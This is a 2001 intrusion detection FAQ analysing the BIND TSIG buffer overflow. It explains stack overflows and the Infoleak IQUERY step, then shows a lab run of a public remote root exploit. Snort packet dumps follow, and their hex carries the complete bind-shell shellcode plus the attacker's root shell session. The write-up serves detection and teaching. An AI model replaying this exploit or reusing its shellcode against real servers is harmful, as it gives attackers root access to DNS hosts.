
Intrusion Detection FAQ: What is the TSIG vulnerability?

Paul Asadoorian
April 4, 2001

Introduction

Awareness of the Bind TSIG (short for transaction signature) attack was raised towards the end of January 2001. This attack affected all current versions of Bind version 4 and 8 (but not 9). Advisories are posted on Bugtraq (http://www.securityfocus.com/vdb/bottom.html?vid=2302), CVE (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0012), CERT (http://www.cert.org/advisories/CA-2001-02.html), and ISC's web site (Internet Software Consortium, http://www.isc.org/products/BIND/bind-security.html).

PGP's COVERT Labs found the exploit. The initial press release can be found at http://www.pgp.com/research/covert/advisories/047.asp. This new buffer overflow attack allows the attacker to gain root access to any DNS server that is running the correct (or incorrect, depending on how you are looking at it) version of Bind. To understand how this attack works you must first understand how buffer overflows work, as well as a little about how Bind operates at the application layer [2].

Buffer Overflows

Buffer overflows occur when a program does not check that the data it is putting into a space will actually fit into that space. Unfortunately computers don't automatically detect when this condition occurs, and since this happens in memory, the data will overwrite whatever comes after the space you are trying to fill. The "spaces" I am referring to are called variables, which for all intents and purposes reside on what's called the stack (or program memory). The following diagram represents what your program, or any other program such as bind, would look like in memory [1] [5]:

-------------------
| Variable 1 |
-------------------
| Variable 2 |
-------------------
| Return Pointer |
-------------------
| Other Pointers |

Variables are always filled from the top moving down. You will notice there is always something below the variables, called the return pointer. This section of memory is used as a placeholder when a program executes different functions: when a function is called, the memory address of the current execution point is put here, the function executes, then execution jumps back to the value in the return pointer. When a buffer overflow condition occurs a variable gets filled with too much data, and since it is filled from top to bottom, the data overwrites the return pointer [1].

-------------------
| Variable 1 |
-------------------
| My code |
-------------------
| Return Pointer |
| Ptr to my code |
-------------------
| Other Pointers |

So by filling a variable with more than it can hold we can rewrite the return pointer and tell it to execute our code (the code will execute as whatever user the daemon is running as, often root). This is not always a very accurate way to execute code on a machine; often the return pointer will not get the correct value. Figuring out exactly where my code is and creating a pointer to it doesn't always work because memory is so dynamic and volatile. The solution to this problem is the NOP (no-operation) instruction, which tells the computer to do nothing. By padding the top of my program with NOP instructions I can be a lot less precise with my return pointer: as long as I hit somewhere in the NOP padding, my malicious code will execute eventually [1] [7].

Bind: Infoleak & TSIG

The TSIG, or Transaction Signature, is a resource record that appends a secure key to the message sent to the DNS server. When a TSIG record is sent without a secure key, code is executed that does not check the bounds of the data before storing it into a variable. There is one problem with exploiting the TSIG code: you need to gather information about environment variables whose values are contained on the stack. This information is obtained by sending an IQUERY (Inverse Query) to the DNS server, which will, due to a bug, return the information needed. This bug is known as Infoleak. So now we can start to build a pattern for this exploit: anyone who wants to use it will need to perform an IQUERY, followed by a TSIG record [4] [6].

The Attack

The code was taken from http://neworder.box.sk/showme.php3?id=4037 and is also posted on hack.co.za at http://www.hack.co.za/exploits/daemon/named/tsig.c (I give two references here because these sites often fall victim to the exploits they contain). It can also be found in Appendix A.

I was able to compile this code on a PC running Red Hat Linux 6.2. I ran it against another Red Hat Linux 6.2 machine, running Bind 8.2.2-P5. I was able to gain root access to the target machine. The following is what the attacker would see when the exploit is run (output has been sanitized):

[root@jabba /root]# ./tsig
[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix
[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net
[*] usage : ./tsig host
[root@jabba /root]# ./tsig VICTOM
[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix
[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net
[*] attacking VICTOM (VICTOM)
[d] HEADER is 12 long
[d] infoleak_qry was 476 long
[*] iquery resp len = 719
[d] argevdisp1 = 080d7cd0, argevdisp2 = 4010f704
[*] retrieved stack offset = bffff9d8
[d] evil_query(buff, bffff9d8)
[d] shellcode is 134 long
[d] olb = 216
[*] injecting shellcode at 1
[*] connecting..
[*] wait for your shell..
Linux VICTOM 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
4(adm),6(disk),10(wheel)
ls
ADMROCKS
db.foo-zone
db.foo-rev-zone
db.domain.com
db.anotherdomain
db.mydomain.com
db.somoneelsesdomain.com
db.someotherdomain.com
db.somedomain.com
db.somedomain.net
db.somedomain.org
named-xfer
named.127.0.0
named.ca
named.local
named_dump.db

As you can see above, I was able to gain root access to the target machine. As the program executes you can clearly see the order in which it carries out the attack. It starts with the Infoleak query, which gets a response 719 bytes long. Then it extracts the information it needs and executes the "evil_query" function, which sends the erroneous TSIG record, causing the buffer to overflow with the shellcode. Once it has a shell the program executes two Unix commands, 'uname -a' and 'id', to give you some information about the machine that was just compromised. Once the shell was presented I was able to enter commands, and issued the 'ls' command for demonstration purposes.

Analyzing & Detecting the Attack

When I ran this exploit I was also running snort 1.7, told to grab all packets on the network (using ./snort -ved):

02/22-15:33:19.465555 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x206
ATTACKER:1024 -> VICTOM:53 UDP TTL:64 TOS:0x0 ID:6753 IpLen:20 DgmLen:504
Len: 484
BE EF 09 80 00 00 00 01 00 00 00 00 3E 00 00 00 ............>...
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 3E 00 00 00 00 ...........>....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 3E 00 00 00 00 00 ..........>.....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 3E 00 00 00 00 00 00 .........>......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 3E 00 00 00 00 00 00 00 ........>.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 3E 00 00 00 00 00 00 00 00 .......>........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 3E 00 00 00 00 00 00 00 00 00 ......>.........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 FF ................
00 00 00 00 00 00 00 00 00 00 00 00 ............
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.469874 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x2F9
VICTOM:53 -> ATTACKER:1024 UDP TTL:64 TOS:0x0 ID:61854 IpLen:20 DgmLen:747
Len: 727
BE EF 89 81 00 00 00 00 00 00 00 00 3E 00 00 00 ............>...
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 3E 00 00 00 00 ...........>....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 3E 00 00 00 00 00 ..........>.....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 3E 00 00 00 00 00 00 .........>......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 3E 00 00 00 00 00 00 00 ........>.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 3E 00 00 00 00 00 00 00 00 .......>........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 3E 00 00 00 00 00 00 00 00 00 ......>.........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 FF ................
00 00 00 00 00 00 00 00 00 00 00 00 98 77 95 3A .............w.:
20 8B 6F 12 06 00 00 00 48 D6 19 3B 06 00 00 00 .o.....H..;....
48 D6 19 3B 91 77 95 3A 58 76 3F 2E 94 F9 FF BF H..;.w.:Xv?.....
D6 39 08 08 02 00 04 00 C0 A8 00 03 00 00 00 00 .9..............
A0 31 2E C1 D8 F9 FF BF B5 6C 08 08 70 54 0D 08 .1.......l..pT..
7C 47 11 40 16 00 00 00 01 00 00 00 70 54 0D 08 |G.@........pT..
05 00 00 00 C0 EA 0B 08 16 00 00 00 01 00 00 00 ................
9C DE 05 08 7C 47 11 40 04 FA FF BF 50 54 0D 08 ....|G.@....PT..
00 00 00 00 08 FB FF BF 08 FB FF BF 09 D4 05 08 ................
70 54 0D 08 04 F7 10 40 EC A1 10 40 60 AE 00 40 pT.....@...@`..@
54 FB FF BF D5 BA 02 40 68 38 01 40 C8 43 01 40 T......@h8.@.C.@
D6 41 00 00 04 F7 10 40 62 5A 00 00 E6 81 00 40 .A.....@bZ.....@
D5 BA 02 40 04 40 02 40 68 38 01 40 D0 3E 01 40 ...@.@.@h8.@.>.@
58 90 04 08 60 3D 00 00 A0 3C 02 40 F3 06 00 00 X...`=...<.@....
D0 3F 02 40 70 CD 01 40 C8 43 01 40 03 00 00 00 .?.@p..@.C.@....
38 46 01 40 01 00 00 00 60 FA FF BF 08 87 04 8F.@....`......
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.472301 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x228
ATTACKER:1024 -> VICTOM:53 UDP TTL:64 TOS:0x0 ID:6755 IpLen:20 DgmLen:538
Len: 518
DE AD 01 80 00 07 00 00 00 00 00 01 3F 00 01 02 ............?...
03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 ................
13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 ............. !"
23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 #$%&'()*+,-./012
33 34 35 36 37 38 39 3A 3B 3C EB 0A 02 00 00 C0 3456789:;<......
00 00 00 00 00 3F 00 01 EB 44 5E 29 C0 89 46 10 .....?...D^)..F.
40 89 C3 89 46 0C 40 89 46 08 8D 4E 08 B0 66 CD @...F.@.F..N..f.
80 43 C6 46 10 10 66 89 5E 14 88 46 08 29 C0 89 .C.F..f.^..F.)..
C2 89 46 18 B0 90 66 89 46 16 8D 4E 14 89 4E 0C ..F...f.F..N..N.
8D 4E 08 EB 07 C0 00 00 00 00 00 3F EB 02 EB 43 .N.........?...C
B0 66 CD 80 89 5E 0C 43 43 B0 66 CD 80 89 56 0C .f...^.CC.f...V.
89 56 10 B0 66 43 CD 80 86 C3 B0 3F 29 C9 CD 80 .V..fC.....?)...
B0 3F 41 CD 80 B0 3F 41 CD 80 88 56 07 89 76 0C .?A...?A...V..v.
87 F3 8D 4B 0C B0 0B CD 80 EB 07 C0 00 00 00 00 ...K............
00 3F 90 E8 72 FF FF FF 2F 62 69 6E 2F 73 68 00 .?..r.../bin/sh.
0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D ................
1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D .. !"#$%&'()*+,-
2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C EB ./0123456789:;<.
07 C0 00 00 00 00 00 3F 00 01 02 03 04 05 06 07 .......?........
08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 ................
18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 ........ !"#$%&'
28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 36 37 ()*+,-./01234567
38 39 3A 3B 3C EB 07 C0 00 00 00 00 00 3F 00 01 89:;<........?..
02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 ................
D8 FA FF BF D8 F7 FF BF D0 7C 0D 08 04 F7 10 40 .........|.....@
22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 "#$%&'()*+,-./01
32 33 34 35 36 37 38 39 3A 3B 3C EB 07 C0 00 00 23456789:;<.....
00 00 00 3F 00 01 02 03 04 05 06 07 08 09 0A 0B ...?............
0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B ................
1C 1D 1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B .... !"#$%&'()*+
2C 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B ,-./0123456789:;
3C EB 07 C0 00 00 00 00 00 00 00 FA 00 FF <.............
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.476199 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x23F
VICTOM:53 -> ATTACKER:1024 UDP TTL:64 TOS:0x0 ID:61855 IpLen:20 DgmLen:561
Len: 541
DE AD 81 80 00 07 00 00 00 00 00 01 3F 00 01 02 ............?...
03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 ................
13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 ............. !"
23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 #$%&'()*+,-./012
33 34 35 36 37 38 39 3A 3B 3C EB 0A 02 00 00 C0 3456789:;<......
00 00 00 00 00 3F 00 01 EB 44 5E 29 C0 89 46 10 .....?...D^)..F.
40 89 C3 89 46 0C 40 89 46 08 8D 4E 08 B0 66 CD @...F.@.F..N..f.
80 43 C6 46 10 10 66 89 5E 14 88 46 08 29 C0 89 .C.F..f.^..F.)..
C2 89 46 18 B0 90 66 89 46 16 8D 4E 14 89 4E 0C ..F...f.F..N..N.
8D 4E 08 EB 07 C0 00 00 00 00 00 3F EB 02 EB 43 .N.........?...C
B0 66 CD 80 89 5E 0C 43 43 B0 66 CD 80 89 56 0C .f...^.CC.f...V.
89 56 10 B0 66 43 CD 80 86 C3 B0 3F 29 C9 CD 80 .V..fC.....?)...
B0 3F 41 CD 80 B0 3F 41 CD 80 88 56 07 89 76 0C .?A...?A...V..v.
87 F3 8D 4B 0C B0 0B CD 80 EB 07 C0 00 00 00 00 ...K............
00 3F 90 E8 72 FF FF FF 2F 62 69 6E 2F 73 68 00 .?..r.../bin/sh.
0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D ................
1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D .. !"#$%&'()*+,-
2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C EB ./0123456789:;<.
07 C0 00 00 00 00 00 3F 00 01 02 03 04 05 06 07 .......?........
08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 ................
18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 ........ !"#$%&'
28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 36 37 ()*+,-./01234567
38 39 3A 3B 3C EB 07 C0 00 00 00 00 00 3F 00 01 89:;<........?..
02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 ................
D8 FA FF BF D8 F7 FF BF D0 7C 0D 08 04 F7 10 40 .........|.....@
22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 "#$%&'()*+,-./01
32 33 34 35 36 37 38 39 3A 3B 3C EB 07 C0 00 00 23456789:;<.....
00 00 00 3F 00 01 02 03 04 05 06 07 08 09 0A 0B ...?............
0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B ................
1C 1D 1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B .... !"#$%&'()*+
2C 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B ,-./0123456789:;
3C EB 07 C0 00 00 00 00 00 00 00 FA 00 FF 00 00 <...............
00 00 00 11 00 00 00 3A 95 77 98 01 2C 00 00 DE .......:.w..,...
AD 00 11 00 00 .....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.476302 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x24E
ATTACKER -> VICTOM ICMP TTL:255 TOS:0xC0 ID:6757 IpLen:20 DgmLen:576
Type:3 Code:3 DESTINATION UNREACHABLE: PORT UNREACHABLE
** ORIGINAL DATAGRAM DUMP:
VICTOM:53 -> ATTACKER:1024 UDP TTL:64 TOS:0x0 ID:61855 IpLen:20 DgmLen:561
Len: 541
** END OF DUMP
00 00 00 00 45 00 02 31 F1 9F 00 00 40 11 05 C5 ....E..1....@...
C0 A8 00 04 C0 A8 00 03 00 35 04 00 02 1D 87 10 .........5......
DE AD 81 80 00 07 00 00 00 00 00 01 3F 00 01 02 ............?...
03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 ................
13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 ............. !"
23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 #$%&'()*+,-./012
33 34 35 36 37 38 39 3A 3B 3C EB 0A 02 00 00 C0 3456789:;<......
00 00 00 00 00 3F 00 01 EB 44 5E 29 C0 89 46 10 .....?...D^)..F.
40 89 C3 89 46 0C 40 89 46 08 8D 4E 08 B0 66 CD @...F.@.F..N..f.
80 43 C6 46 10 10 66 89 5E 14 88 46 08 29 C0 89 .C.F..f.^..F.)..
C2 89 46 18 B0 90 66 89 46 16 8D 4E 14 89 4E 0C ..F...f.F..N..N.
8D 4E 08 EB 07 C0 00 00 00 00 00 3F EB 02 EB 43 .N.........?...C
B0 66 CD 80 89 5E 0C 43 43 B0 66 CD 80 89 56 0C .f...^.CC.f...V.
89 56 10 B0 66 43 CD 80 86 C3 B0 3F 29 C9 CD 80 .V..fC.....?)...
B0 3F 41 CD 80 B0 3F 41 CD 80 88 56 07 89 76 0C .?A...?A...V..v.
87 F3 8D 4B 0C B0 0B CD 80 EB 07 C0 00 00 00 00 ...K............
00 3F 90 E8 72 FF FF FF 2F 62 69 6E 2F 73 68 00 .?..r.../bin/sh.
0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D ................
1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D .. !"#$%&'()*+,-
2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C EB ./0123456789:;<.
07 C0 00 00 00 00 00 3F 00 01 02 03 04 05 06 07 .......?........
08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 ................
18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 ........ !"#$%&'
28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 36 37 ()*+,-./01234567
38 39 3A 3B 3C EB 07 C0 00 00 00 00 00 3F 00 01 89:;<........?..
02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 ................
D8 FA FF BF D8 F7 FF BF D0 7C 0D 08 04 F7 10 40 .........|.....@
22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 "#$%&'()*+,-./01
32 33 34 35 36 37 38 39 3A 3B 3C EB 07 C0 00 00 23456789:;<.....
00 00 00 3F 00 01 02 03 04 05 06 07 08 09 0A 0B ...?............
0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B ................
1C 1D 1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B .... !"#$%&'()*+
2C 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B ,-./0123456789:;
3C EB 07 C0 00 00 00 00 00 00 00 FA 00 FF 00 00 <...............
00 00 00 11 00 00 00 3A .......:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.494214 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x4A
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6758 IpLen:20 DgmLen:60 DF
******S* Seq: 0x657DB22 Ack: 0x0 Win: 0x7D78 TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 936946 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.495108 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x4A
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61856 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x71CDF72 Ack: 0x657DB23 Win: 0x7D78 TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 275287630 936946 NOP
TCP Options => WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.495220 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6759 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB23 Ack: 0x71CDF73 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 936946 275287630
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.514153 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x51
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6760 IpLen:20 DgmLen:67 DF
***AP*** Seq: 0x657DB23 Ack: 0x71CDF73 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 936948 275287630
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 0A 00 uname -a; id;..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.515099 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x42
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61857 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x71CDF73 Ack: 0x657DB32 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287632 936948
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.525372 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x84
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61858 IpLen:20 DgmLen:118 DF
***AP*** Seq: 0x71CDF73 Ack: 0x657DB32 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287633 936948
4C 69 6E 75 78 20 79 6F 64 61 20 32 2E 32 2E 31 Linux yoda 2.2.1
34 2D 35 2E 30 20 23 31 20 54 75 65 20 4D 61 72 4-5.0 #1 Tue Mar
20 37 20 32 30 3A 35 33 3A 34 31 20 45 53 54 20 7 20:53:41 EST
32 30 30 30 20 69 35 38 36 20 75 6E 6B 6E 6F 77 2000 i586 unknow
6E 0A n.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.525467 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6761 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB32 Ack: 0x71CDFB5 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 936949 275287633
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.541777 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x9A
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61859 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x71CDFB5 Ack: 0x657DB32 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287635 936949
75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D uid=0(root) gid=
30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73 3D 30 0(root) groups=0
28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C 32 28 (root),1(bin),2(
64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29 2C 34 daemon),3(sys),4
28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C 31 30 (adm),6(disk),10
28 77 68 65 65 6C 29 0A (wheel).
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.544111 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6762 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB32 Ack: 0x71CE00D Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 936951 275287635
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:21.833490 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x45
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6767 IpLen:20 DgmLen:55 DF
***AP*** Seq: 0x657DB32 Ack: 0x71CE00D Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 937179 275287635
6C 73 0A ls.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:21.846546 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x126
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61860 IpLen:20 DgmLen:280 DF
***AP*** Seq: 0x71CE00D Ack: 0x657DB35 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287865 937179
41 44 4D 52 4F 43 4B 53 0A 64 62 2E 32 34 2E 30 ADMROCKS.db.24.0
2E 32 34 39 0A 64 62 2E 36 35 2E 32 2E 31 39 39 .249.db.65.2.199
0A 64 62 2E 63 70 75 2D 6E 65 2E 63 6F 6D 0A 64 .db.cpu-ne.com.d
62 2E 66 69 73 68 69 6E 70 72 6F 0A 64 62 2E 66 b.fishinpro.db.f
6F 6F 2D 62 79 74 65 2E 63 6F 6D 0A 64 62 2E 68 oo-byte.com.db.h
61 75 6E 74 65 64 6C 61 62 79 72 69 6E 74 68 2E auntedlabyrinth.
63 6F 6D 0A 64 62 2E 70 61 75 6C 64 6F 74 63 6F com.db.pauldotco
6D 0A 64 62 2E 72 69 6F 75 74 64 6F 6F 72 73 2E m.db.rioutdoors.
63 6F 6D 0A 64 62 2E 72 69 6F 75 74 64 6F 6F 72 com.db.rioutdoor
73 2E 6E 65 74 0A 64 62 2E 72 69 6F 75 74 64 6F s.net.db.rioutdo
6F 72 73 2E 6F 72 67 0A 6E 61 6D 65 64 2D 78 66 ors.org.named-xf
65 72 0A 6E 61 6D 65 64 2E 31 32 37 2E 30 2E 30 er.named.127.0.0
0A 6E 61 6D 65 64 2E 63 61 0A 6E 61 6D 65 64 2E .named.ca.named.
6C 6F 63 61 6C 0A 6E 61 6D 65 64 5F 64 75 6D 70 local.named_dump
2E 64 62 0A .db.
